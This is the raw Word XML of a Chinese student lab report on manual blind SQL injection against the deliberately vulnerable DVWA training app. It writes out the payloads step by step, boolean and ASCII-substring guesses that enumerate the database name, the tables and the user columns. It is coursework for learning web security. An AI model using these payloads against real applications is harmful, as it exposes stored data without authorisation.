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center"/>
        <w:textAlignment w:val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righ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2112060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孙蕗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信息安全一班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right"/>
        <w:textAlignment w:val="auto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SQL盲注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jc w:val="left"/>
        <w:textAlignment w:val="auto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基于DVWA里的SQL盲注案例，实施手工盲注，参考课本，撰写实验报告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jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"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一、判断是否存在注入，注入是字符型还是数字型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1.输入 1，显示相应用户存在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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4511040" cy="1318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2.输入 1' and 1=1 #,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>单引号为了闭合原来SQL语句中的第一个单引号，后面的#为了闭合后面的单引号。运行后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>显示相应用户存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4358640" cy="1264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3.输入 1' and 1=2 #，显示不存在，说明存在字符型的 SQL 盲注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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4404360" cy="807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点页面右下角 View Source，来查看源代码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在安全级别为low的情况下，程序并未对id做任何处理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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="442531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二、猜测当前数据库名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输入 1' and length(database())=1 #，显示不存在；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输入 1' and length(database())=2 #，显示不存在；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输入 1' and length(database())=3 #，显示不存在；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输入 1' and length(database())=4 #，显示存在，说明数据库名长度为4。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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4732020" cy="13335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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入1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ascii(substr(database(),1,1))97 #,显示存在，说明数据库名的第个字符的ASCII值大于97(小写字母 a的ASCII值);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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入1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ascii(substr(database(),1,1))&lt;122 #,显示存在,说明数据库名的第一个字符的ASCII值小于122(小写字母z的ASCII值);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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入1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ascii(substr(database(),1,1))&lt;109 #,显示存在,说明数据库名的第一个字符的 ASCII值小于109(小写字母 m的ASCII值);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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入1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asc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i(substr(database(),1,1))&lt;103 #，显示存在说明数据库名的第一个字符的 ASCII值小于 103(小写字母g的ASCII值);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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入1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ascii(substr(database(),1,1))&lt;100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，显示不存在说明数据库名的第一个字符的ASCII值不小于100(小写字母d的ASCII值);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1'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ascii(substr(database(),1,1))&gt;100 #,显示不存在说明数据库名的第一个字符的 ASCII值不大于 100(小写字母 d 的ASCII 值),所以数据库名的第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个字符的ASCI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值为100,即小写字母 d。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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重复上述步骤,就可以猜解出完整的数据库名(dvwa)了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三、猜测数据库表名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首先猜解数据库中表的数量：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1' and (select count (table_name) from information_schema.tables where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table_schema=database())=1 # 显示不存在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1' and (select count (table_name) from information_schema.tables where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table_schema=database() )=2 # 显示存在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说明数据库中共有两个表。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接着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>逐一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">猜解表名：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1' and length(substr((select table_name from information_schema.tables where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table_schema=database() limit 0,1),1))=1 # 显示不存在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1' and length(substr((select table_name from information_schema.tables where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table_schema=database() limit 0,1),1))=2 # 显示不存在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…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1' and length(substr((select table_name from information_schema.tables where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table_schema=database() limit 0,1),1))=9 # 显示存在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说明第一个表名长度为 9。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接下来,继续用二分法来猜测数据库中的表名。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l'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>and ascii(substr((select table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>name from information_schema.tables where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>table_schema=database() limit 0,1),1,1))&gt;97 #，显示存在;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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>'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>and ascii(substr((select table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>name from information_schema.tables where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>table_schema=database() limit 0,1),1,1))&lt;122 #，显示存在;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l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>nd ascii(substr((select table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>name from information_schema.tables where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table_schema=database() limit 0,1),1,1))109 #，显示存在;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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>and ascii(substr((select table_name from information_schema.tables where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>table_schema=database() limit 0,1),1,1))&lt;103 #，显示不存在;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l' and ascii(substr((select table name from information_schema.tables where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>table_schema=database() limit 0,1),1,1))&gt;103 #，显示不存在。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...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说明第一个表的名字的第一个字符为小写字母 g。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重复上述步骤，即可猜解出两个表名(guestbook、users)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四、猜测表中字段名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首先猜解表中字段的数量：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1’ and (select count(column_name) from information_schema.columns where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table_name= ’users’)=1# 显示不存在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…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1’ and (select count(column_name) from information_schema.columns where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table_name= ’users’)=8 # 显示存在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说明 users 表有 8 个字段。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接着挨个猜解字段名：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1’ and length(substr((select column_name from information_schema.columns where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table_name= ’users’ limit 0,1),1))=1 # 显示不存在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…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1’ and length(substr((select column_name from information_schema.columns where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table_name= ’users’ limit 0,1),1))=7 # 显示存在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说明 users 表的第一个字段为 7 个字符长度。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采用二分法，即可猜解出所有字段名。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五、猜测表中数据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采用二分法进行猜测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本次实验通过手工盲注的方式对DVWA中的SQL注入进行了实践。通过逐步猜解，可以获取数据库名、表名、字段名以及具体数据。这个过程需要耐心和技巧，需要理解SQL注入的原理和基本的盲注技巧。同时，实验中还涉及到了源代码的查看和分析，加深了对Web应用安全的理解。通过这次实验，我对SQL盲注有了更深入的认识，也提高了对安全漏洞的识别和利用能力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ascii="宋体" w:hAnsi="宋体" w:eastAsia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B434DD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F3B434D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NzU4MmJiMGFiOWZlMWQwNWVhOWRiZTc2ZDdiZGYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="001F1E13"/>
    <w:rsid w:val="0000472F"/>
    <w:rsid w:val="00015EEE"/>
    <w:rsid w:val="000C408B"/>
    <w:rsid w:val="00114A1E"/>
    <w:rsid w:val="00125861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78C3657"/>
    <w:rsid w:val="07D57A72"/>
    <w:rsid w:val="1BB27AA1"/>
    <w:rsid w:val="26BA12DF"/>
    <w:rsid w:val="282C5C7A"/>
    <w:rsid w:val="2B373B1E"/>
    <w:rsid w:val="33370B5F"/>
    <w:rsid w:val="34EF058C"/>
    <w:rsid w:val="463D7DE3"/>
    <w:rsid w:val="52E55A8A"/>
    <w:rsid w:val="5EF152D6"/>
    <w:rsid w:val="66062A2F"/>
    <w:rsid w:val="73C5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1202</Words>
  <Characters>2945</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>8</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3195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sl</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-04T02:05:43Z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19422F70D81B4DDCB582099764804750_12</vt:lpwstr>
  </property>
</Properties>
</file>